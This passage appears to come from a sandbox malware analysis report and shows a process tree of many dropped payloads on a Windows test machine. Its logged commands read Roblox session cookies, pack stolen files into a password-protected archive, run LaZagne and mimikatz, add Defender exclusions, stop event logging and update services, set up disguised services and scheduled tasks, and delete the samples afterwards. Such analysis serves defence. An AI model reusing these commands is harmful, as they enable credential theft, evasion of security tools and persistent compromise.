APQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=6⤵PID:2400
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4tbyaxz2\4tbyaxz2.cmdline"7⤵PID:1128
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9477.tmp" "c:\Users\Admin\AppData\Local\Temp\4tbyaxz2\CSC3FE9622E83E945B3BBE9103D2457C7F6.TMP"8⤵PID:4512
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:3664
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:8
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"5⤵PID:808
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts6⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:1016
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:1112
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:344
-
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:4676
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"5⤵PID:1788
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts6⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:3192
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:4192
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:1180
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:1092
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
PID:4380
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:4512
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:3628
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:4844
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:5020
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"5⤵PID:5088
-
C:\Windows\system32\getmac.exegetmac6⤵PID:4528
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1268"5⤵PID:5800
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 12686⤵
- Kills process with taskkill
PID:2500
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1268"5⤵PID:5176
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:1788
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 12686⤵
- Kills process with taskkill
PID:2116
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"5⤵PID:4296
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY6⤵
- Command and Scripting Interpreter: PowerShell
PID:4760
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"5⤵PID:5816
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY6⤵PID:1876
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI37042\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\eWeUb.zip" *"5⤵PID:5936
-
C:\Users\Admin\AppData\Local\Temp\_MEI37042\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI37042\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\eWeUb.zip" *6⤵PID:944
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"5⤵PID:5176
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption6⤵PID:5664
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"5⤵PID:2044
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory6⤵PID:3676
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"5⤵PID:5688
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid6⤵PID:1640
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"5⤵PID:3432
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER6⤵
- Command and Scripting Interpreter: PowerShell
PID:2960
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵PID:512
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
PID:8
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"5⤵PID:560
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault6⤵PID:2136
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Built.exe""5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3228 -
C:\Windows\system32\PING.EXEping localhost -n 36⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5884
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\onedrive.exe"C:\Users\Admin\AppData\Local\Temp\onedrive.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:3948 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
PID:4232
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵PID:2152
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:624
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "KOPWGCIF"4⤵
- Launches sc.exe
PID:2140
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "KOPWGCIF" binpath= "C:\ProgramData\gfmqvycsvzww\vsrumanlxdbr.exe" start= "auto"4⤵
- Launches sc.exe
PID:2340
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:1904
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "KOPWGCIF"4⤵
- Launches sc.exe
PID:4704
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\boost.exe"C:\Users\Admin\AppData\Local\Temp\a\boost.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5076
-
-
C:\Users\Admin\AppData\Local\Temp\a\CE5M.exe"C:\Users\Admin\AppData\Local\Temp\a\CE5M.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:3948 -
C:\Users\Admin\AppData\Roaming\All function.exe"C:\Users\Admin\AppData\Roaming\All function.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
PID:4364 -
C:\Users\Admin\AppData\Roaming\ALL slumzick.exe"C:\Users\Admin\AppData\Roaming\ALL slumzick.exe"4⤵
- Executes dropped EXE
PID:3524
-
-
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"4⤵
- Executes dropped EXE
PID:3864
-
-
-
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:4508 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:1492
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:5244
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:5988
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:5736
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:6028
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\CE5Mv2.exe"C:\Users\Admin\AppData\Local\Temp\a\CE5Mv2.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:3744 -
C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe"C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
PID:4224 -
C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe"C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
PID:704 -
C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe"C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
PID:4544 -
C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe"C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
PID:3724 -
C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe"C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
PID:4756 -
C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe"C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe"8⤵
- Checks computer location settings
- Executes dropped EXE
PID:3960 -
C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe"C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe"9⤵
- Checks computer location settings
- Executes dropped EXE
PID:1892 -
C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe"C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe"10⤵
- Checks computer location settings
- Executes dropped EXE
PID:332 -
C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe"C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe"11⤵
- Checks computer location settings
- Executes dropped EXE
PID:4656 -
C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe"C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe"12⤵
- Checks computer location settings
- Executes dropped EXE
PID:4352 -
C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe"C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe"13⤵
- Checks computer location settings
- Executes dropped EXE
PID:3760 -
C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe"C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe"14⤵
- Executes dropped EXE
PID:1744
-
-
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"14⤵
- Executes dropped EXE
PID:3624
-
-
-
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"13⤵
- Executes dropped EXE
PID:2392
-
-
-
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"12⤵
- Executes dropped EXE
PID:4960
-
-
-
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"11⤵
- Executes dropped EXE
PID:3864
-
-
-
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"10⤵
- Executes dropped EXE
PID:4268
-
-
-
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"9⤵
- Executes dropped EXE
PID:1788
-
-
-
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"8⤵
- Executes dropped EXE
PID:4512
-
-
-
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"7⤵
- Executes dropped EXE
PID:4224
-
-
-
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"6⤵
- Executes dropped EXE
PID:4044
-
-
-
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"5⤵
- Executes dropped EXE
PID:400
-
-
-
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"4⤵
- Executes dropped EXE
PID:4364
-
-
-
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"3⤵
- Executes dropped EXE
PID:3196
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Fulloptionv2.exe"C:\Users\Admin\AppData\Local\Temp\a\Fulloptionv2.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1272 -
C:\Users\Admin\AppData\Local\Temp\a\._cache_Fulloptionv2.exe"C:\Users\Admin\AppData\Local\Temp\a\._cache_Fulloptionv2.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
PID:5064 -
C:\Users\Admin\AppData\Roaming\Fulloptionnew_by elegance.exe"C:\Users\Admin\AppData\Roaming\Fulloptionnew_by elegance.exe"4⤵
- Executes dropped EXE
PID:2676
-
-
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"4⤵
- Executes dropped EXE
PID:668
-
-
-
C:\ProgramData\Synaptics\Synaptics.exe"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2340 -
C:\Users\Admin\AppData\Local\Temp\a\._cache_Synaptics.exe"C:\Users\Admin\AppData\Local\Temp\a\._cache_Synaptics.exe" InjUpdate4⤵
- Checks computer location settings
- Executes dropped EXE
PID:4256 -
C:\Users\Admin\AppData\Roaming\Fulloptionnew_by elegance.exe"C:\Users\Admin\AppData\Roaming\Fulloptionnew_by elegance.exe"5⤵PID:3236
-
-
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"5⤵PID:1688
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\33.exe"C:\Users\Admin\AppData\Local\Temp\a\33.exe"2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4544
-
-
C:\Users\Admin\AppData\Local\Temp\a\image.exe"C:\Users\Admin\AppData\Local\Temp\a\image.exe"2⤵
- Checks BIOS information in registry
PID:5292 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows'3⤵PID:5460
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows'4⤵
- Command and Scripting Interpreter: PowerShell
PID:5864
-
-
-
C:\ProgramData\windows\windows.exe"C:\ProgramData\windows\windows.exe" {05756468-6434-465A-9313-8CAA82F857B2}3⤵
- Checks BIOS information in registry
- Suspicious behavior: MapViewOfSection
PID:5932 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows'4⤵PID:5728
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"4⤵
- Checks BIOS information in registry
PID:5744
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"4⤵
- Checks BIOS information in registry
- Drops startup file
PID:5468
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\wp.exe"C:\Users\Admin\AppData\Local\Temp\a\wp.exe"2⤵
- Loads dropped DLL
- Checks processor information in registry
PID:1204 -
C:\Windows\SYSTEM32\systeminfo.exe"systeminfo.exe"3⤵
- Gathers system information
PID:5648
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\LaZagne.exe"C:\Users\Admin\AppData\Local\Temp\a\LaZagne.exe"2⤵PID:5756
-
C:\Users\Admin\AppData\Local\Temp\a\LaZagne.exe"C:\Users\Admin\AppData\Local\Temp\a\LaZagne.exe"3⤵
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:5916
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\a\mimikatz.exe"2⤵PID:3128
-
-
C:\Users\Admin\AppData\Local\Temp\a\gp.exe"C:\Users\Admin\AppData\Local\Temp\a\gp.exe"2⤵PID:5924
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4756
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Akagi64.exe"C:\Users\Admin\AppData\Local\Temp\a\Akagi64.exe"2⤵PID:3288
-
-
C:\Users\Admin\AppData\Local\Temp\a\chrome_93.exe"C:\Users\Admin\AppData\Local\Temp\a\chrome_93.exe"2⤵PID:5948
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
PID:644
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart3⤵PID:4800
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart4⤵PID:2252
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc3⤵
- Launches sc.exe
PID:2488
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:5444
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv3⤵
- Launches sc.exe
PID:3204
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits3⤵
- Launches sc.exe
PID:5064
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc3⤵
- Launches sc.exe
PID:232
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Power Settings
PID:5804
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Power Settings
PID:1376
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Power Settings
PID:4972
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Power Settings
PID:3716
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"3⤵
- Launches sc.exe
PID:2408
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"3⤵
- Launches sc.exe
PID:1916
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
PID:4236
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"3⤵
- Launches sc.exe
PID:1364
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\msgde.exe"C:\Users\Admin\AppData\Local\Temp\a\msgde.exe"2⤵PID:1268
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "msgde" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:1688
-
-
C:\Windows\system32\SubDir\Client.exe"C:\Windows\system32\SubDir\Client.exe"3⤵PID:3584
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "msgde" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:5592
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\OneDrive.exe"C:\Users\Admin\AppData\Local\Temp\a\OneDrive.exe"2⤵PID:332
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Microsoft OneDrive" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Onedrive\Onedrive.exe" /rl HIGHEST /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:5280
-
-
C:\Users\Admin\AppData\Roaming\Onedrive\Onedrive.exe"C:\Users\Admin\AppData\Roaming\Onedrive\Onedrive.exe"3⤵PID:5084
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Microsoft OneDrive" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Onedrive\Onedrive.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:4184
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\121.exe"C:\Users\Admin\AppData\Local\Temp\a\121.exe"2⤵PID:1368
-
-
C:\Users\Admin\AppData\Local\Temp\a\12.exe"C:\Users\Admin\AppData\Local\Temp\a\12.exe"2⤵PID:2536
-
-
C:\Users\Admin\AppData\Local\Temp\a\EZFN%20op%20cheats.exe"C:\Users\Admin\AppData\Local\Temp\a\EZFN%20op%20cheats.exe"2⤵PID:3992
-
-
C:\Users\Admin\AppData\Local\Temp\a\vncgroups.exe"C:\Users\Admin\AppData\Local\Temp\a\vncgroups.exe"2⤵PID:5752
-
-
C:\Users\Admin\AppData\Local\Temp\a\blq.exe"C:\Users\Admin\AppData\Local\Temp\a\blq.exe"2⤵PID:4244
-
C:\Users\Admin\AppData\Local\Temp\a\._cache_blq.exe"C:\Users\Admin\AppData\Local\Temp\a\._cache_blq.exe"3⤵PID:4504
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 1 && del /f/q "C:\Users\Admin\AppData\Local\Temp\a\._cache_blq.exe"4⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:5348 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 15⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4516
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\swift-bootstrapper.exe"C:\Users\Admin\AppData\Local\Temp\a\swift-bootstrapper.exe"2⤵PID:5812
-
-
C:\Users\Admin\AppData\Local\Temp\a\22.exe"C:\Users\Admin\AppData\Local\Temp\a\22.exe"2⤵PID:3704
-
-
C:\Users\Admin\AppData\Local\Temp\a\expt64.exe"C:\Users\Admin\AppData\Local\Temp\a\expt64.exe"2⤵PID:2988
-
-
C:\Users\Admin\AppData\Local\Temp\a\Out.exe"C:\Users\Admin\AppData\Local\Temp\a\Out.exe"2⤵PID:2288
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2288 -s 5923⤵
- Program crash
PID:6016
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\zxc.exe"C:\Users\Admin\AppData\Local\Temp\a\zxc.exe"2⤵PID:3264
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3264 -s 8483⤵
- Program crash
PID:3344
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\crypt_file.exe"C:\Users\Admin\AppData\Local\Temp\a\crypt_file.exe"2⤵PID:2532
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2532 -s 12403⤵
- Program crash
PID:672
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2532 -s 12243⤵
- Program crash
PID:3052
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\MicrosoftOfficeWord.exe"C:\Users\Admin\AppData\Local\Temp\a\MicrosoftOfficeWord.exe"2⤵PID:232
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 232 -s 4963⤵
- Program crash
PID:5088
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\FeedStation.exe"C:\Users\Admin\AppData\Local\Temp\a\FeedStation.exe"2⤵PID:4028
-
-
C:\Users\Admin\AppData\Local\Temp\a\davies.exe"C:\Users\Admin\AppData\Local\Temp\a\davies.exe"2⤵PID:4788
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4788 -s 6963⤵
- Program crash
PID:2580
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\build.exe"C:\Users\Admin\AppData\Local\Temp\a\build.exe"2⤵PID:400
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6028
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"3⤵PID:2184
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\123.exe"C:\Users\Admin\AppData\Local\Temp\a\123.exe"2⤵PID:3476
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 12403⤵
- Program crash
PID:5916
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\MicrosoftWORD.exe"C:\Users\Admin\AppData\Local\Temp\a\MicrosoftWORD.exe"2⤵PID:6104
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6104 -s 3283⤵
- Program crash
PID:5828
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\tjhikadkrgawd.exe"C:\Users\Admin\AppData\Local\Temp\a\tjhikadkrgawd.exe"2⤵PID:4244
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\tjhikadkrgawd.exe" & rd /s /q "C:\ProgramData\3W4WB1DBIMOZ" & exit3⤵PID:5808
-
C:\Windows\SysWOW64\timeout.exetimeout /t 104⤵
- Delays execution with timeout.exe
PID:1664
-
-
-
-
